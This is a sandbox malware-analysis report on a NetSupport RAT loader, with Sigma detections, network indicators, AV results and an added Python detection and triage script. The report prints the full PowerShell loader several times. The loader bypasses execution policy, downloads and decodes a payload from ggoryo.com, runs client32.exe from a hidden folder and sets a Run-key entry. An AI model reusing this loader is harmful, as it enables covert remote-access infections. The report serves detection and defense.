Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 9211ea20-9fde-4f00-b3bb-f3062e9844ec Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD; Engine Version = 5.1.19041.1682 Runspace ID = 46daa878-c36c-4eaa-b946-d58f3affbc79 Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.IO.Compression.FileSystem", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 9211ea20-9fde-4f00-b3bb-f3062e9844ec Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\Cur

Source: Process started
Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7024, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System

                                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ProcessId: 7024, ProcessName: wscript.exe
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 
'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7024, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System
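The three Sigma hits above all fire on the same process-creation record: wscript.exe spawning powershell.exe, an execution-policy bypass on the command line, and a WebClient download cradle feeding FromBase64String. The Python below is an added example, not part of the Joe Sandbox report and not the loader's own code. It applies those same checks to process-creation events that use the field names of the records above, then statically evaluates the captured command line to recover the stage-2 URL and the Run-key persistence entry instead of matching on the random variable names. The sample events are constructed from the command lines shown on this page plus one invented benign control; PS_CMD is the captured command cut down to the statements the analysis needs; the rule names, helpers and event layout are assumptions. One detail worth having in a hunt: Get-Random's -Maximum is exclusive, so the hidden drop directory is %APPDATA%\EQMIUFUUUCW followed by a number from -5 to 11. This run happened to pick 3 (EQMIUFUUUCW3 in the dropped-file paths on this page), and a hunt keyed on that one folder name misses other infections from the same loader.

```python
import re

# Constructed sample events; the field names follow the Sigma "Process started" records
# above. PS_CMD is the captured command line cut down to the statements analysed here;
# the third event is an invented benign control that must not be flagged.
PS_CMD = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C '
    r"$VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';"
    r"$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);"
    r"$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);"
    r"$asd = Get-Random -Minimum -5 -Maximum 12; "
    r"$JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;"
    r"$s=$JDKPRJIL+'\client32.exe';"
    r"$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';"
    r"New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;"
)
SAMPLE_EVENTS = [
    {"ProcessId": 7024, "ParentImage": "", "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js"'},
    {"ProcessId": 6704, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "CommandLine": PS_CMD},
    {"ProcessId": 4242, "ParentImage": r"C:\Windows\explorer.exe",  # benign control (constructed)
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
]

SCRIPT_HOSTS, SHELLS = {"wscript.exe", "cscript.exe"}, {"powershell.exe", "pwsh.exe", "cmd.exe"}
EXEC_BYPASS = re.compile(r"-e(?:x(?:ec(?:utionpolicy)?)?|p)\s+bypass", re.I)
DOWNLOAD_CRADLE = re.compile(r"\.Download(?:String|File|Data)\(|Invoke-WebRequest|Invoke-RestMethod|\biwr\b", re.I)
CRADLE_ARG = re.compile(r"\.Download(?:String|File|Data)\(\$(\w+)\)", re.I)
B64_DECODE = re.compile(r"FromBase64String\(", re.I)
NEW_ITEM = re.compile(r"New-ItemProperty\s+-Path\s+(\S+)\s+-Name\s+(\S+)\s+-Value\s+(\S+)", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?$", re.I)
ASSIGN = re.compile(r"\$(\w+)\s*=\s*([^;]+);")  # $name=<expr>; (no ';' inside <expr>)
TOKEN = re.compile(r"'[^']*'|[^+]+")  # a quoted literal, or a run of text up to the next '+'
GETFOLDER = re.compile(r"GetFolderPath\('(\w+)'\)")
GETRANDOM = re.compile(r"Get-Random\s+-Minimum\s+(-?\d+)\s+-Maximum\s+(-?\d+)", re.I)
FOLDERS = {"ApplicationData": "%APPDATA%", "LocalApplicationData": "%LOCALAPPDATA%"}
RANGE = re.compile(r"<(-?\d+)\.\.(-?\d+)>")


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def variable_table(cmd):
    return {m.group(1): m.group(2).strip() for m in ASSIGN.finditer(cmd)}


def resolve(expr, table, depth=0):
    # Static evaluation of what this loader uses: 'literal', $var, GetFolderPath('X'),
    # Get-Random -Minimum a -Maximum b (b is exclusive) and '+' concatenation.
    if depth > 8:
        return expr
    out = []
    for tok in (t.strip() for t in TOKEN.findall(expr)):
        if len(tok) >= 2 and tok[0] == tok[-1] == "'":
            out.append(tok[1:-1])
        elif tok.startswith("$") and tok[1:] in table:
            out.append(resolve(table[tok[1:]], table, depth + 1))
        elif (m := GETFOLDER.search(tok)):
            out.append(FOLDERS.get(m.group(1), "%" + m.group(1).upper() + "%"))
        elif (m := GETRANDOM.search(tok)):
            out.append(f"<{int(m.group(1))}..{int(m.group(2)) - 1}>")
        else:
            out.append(tok)
    return "".join(out)


def stage2_url(cmd):
    m = CRADLE_ARG.search(cmd)
    return resolve("$" + m.group(1), variable_table(cmd)) if m else None


def run_key_persistence(cmd):
    m = NEW_ITEM.search(cmd)
    if not m:
        return None
    key, name, value = (resolve(a, variable_table(cmd)) for a in m.groups())
    return {"key": key, "name": name, "value": value} if RUN_KEY.search(key) else None


def expand_range(path):
    """Expand one '<lo..hi>' placeholder into every concrete path worth hunting for."""
    m = RANGE.search(path)
    if not m:
        return [path]
    lo, hi = int(m.group(1)), int(m.group(2))
    return [path[:m.start()] + str(n) + path[m.end():] for n in range(lo, hi + 1)]


def triage(events):
    """Apply the checks the Sigma hits above encode; enrich each hit with derived IOCs."""
    findings = []
    for ev in events:
        cmd, hits = ev["CommandLine"], []
        if basename(ev["ParentImage"]) in SCRIPT_HOSTS and basename(ev["Image"]) in SHELLS:
            hits.append("script_host_spawns_shell")
        if EXEC_BYPASS.search(cmd):
            hits.append("execution_policy_bypass")
        if DOWNLOAD_CRADLE.search(cmd) and B64_DECODE.search(cmd):
            hits.append("download_cradle_base64")
        persist = run_key_persistence(cmd)
        if persist:
            hits.append("run_key_persistence")
        if hits:
            findings.append({"ProcessId": ev["ProcessId"], "rules": hits,
                             "stage2_url": stage2_url(cmd), "persistence": persist})
    return findings
```

On real telemetry, feed it Sysmon Event ID 1 records (the field names match) or Security 4688 events with Creator Process Name mapped onto ParentImage. The evaluator deliberately handles only the expression forms this loader uses and leaves anything else verbatim, so an unresolved `$name` in the output is a signal to look at the command line by hand rather than a silent miss.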

                                Remote Access Functionality

                                Source: File created | Author: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6704, TargetFilename: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\NSM.LIC
                                Timestamp                        SID      Severity  Classtype                                      Source IP     Source Port  Destination IP  Destination Port  Protocol
                                2024-10-08T15:23:14.568547+0200  2827745  1         Malware Command and Control Activity Detected  192.168.2.16  49708        5.181.159.137   443               TCP

                                AV Detection

                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL | ReversingLabs: Detection: 13%
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | ReversingLabs: Detection: 27%
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\remcmdstub.exe | ReversingLabs: Detection: 23%
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,10_2_110ADA40
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\msvcr100.dll
                                Source: unknown | HTTPS traffic detected: 77.83.199.112:443 -> 192.168.2.16:49705 version: TLS 1.2
                                Source: unknown | HTTPS traffic detected: 77.83.199.112:443 -> 192.168.2.16:49707 version: TLS 1.2
                                Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000A.00000002.2533582731.000000006CCA1000.00000020.00000001.01000000.0000000C.sdmp, msvcr100.dll.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2538791982.00000000747F2000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: client32.exe, 0000000A.00000002.2489223815.0000000000442000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000A.00000000.1514998417.0000000000442000.00000002.00000001.01000000.00000008.sdmp, client32.exe.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2538169520.0000000073A85000.00000002.00000001.01000000.0000000A.sdmp, pcicapi.dll.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,10_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,10_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,10_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,10_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,10_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,10_2_1106ABD0

                                Software Vulnerabilities

                                Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                Networking

                                Source: Network traffic | Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.16:49708 -> 5.181.159.137:443
                                Source: C:\Windows\System32\wscript.exe | Network Connect: 77.83.199.112 443
                                Source: global traffic | HTTP traffic detected: GET /trade/da.php?9800 HTTP/1.1
                                    Host: ggoryo.com
                                    Connection: Keep-Alive
                                Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1
                                    Host: geo.netsupportsoftware.com
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                Source: Joe Sandbox View | IP Address: 104.26.1.231
                                Source: Joe Sandbox View | ASN Name: ASN-MOLMoscowRussiaRU
                                Source: Joe Sandbox View | ASN Name: MIVOCLOUDMD
                                Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: global traffic | HTTP traffic detected: POST /trade/fix.php?6867 HTTP/1.1
                                    Accept: */*
                                    Accept-Language: en-ch
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                    Host: ggoryo.com
                                    Content-Length: 7
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                Source: unknown | TCP traffic detected without corresponding DNS query: 5.181.159.137
                                Source: unknown | TCP traffic detected without corresponding DNS query: 5.181.159.137
                                Source: unknown | TCP traffic detected without corresponding DNS query: 5.181.159.137
                                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global traffic | HTTP traffic detected: GET /trade/da.php?9800 HTTP/1.1
                                    Host: ggoryo.com
                                    Connection: Keep-Alive
                                Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1
                                    Host: geo.netsupportsoftware.com
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                Source: global traffic | DNS traffic detected: DNS query: ggoryo.com
                                Source: global traffic | DNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknown | HTTP traffic detected: POST /trade/fix.php?6867 HTTP/1.1
                                    Accept: */*
                                    Accept-Language: en-ch
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                    Host: ggoryo.com
                                    Content-Length: 7
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr | String found in binary or memory: http://%s/fakeurl.htm
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr | String found in binary or memory: http://%s/testpage.htm
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr | String found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: client32.exe, client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr | String found in binary or memory: http://127.0.0.1
                                Source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr | String found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: wscript.exe, 00000000.00000003.1346975876.000001FC5729F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: client32.exe, 0000000A.00000003.1821012459.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1827697976.00000000059EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 0000000A.00000003.1527325191.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1524166542.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1821012459.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1540191948.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.8.dr | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
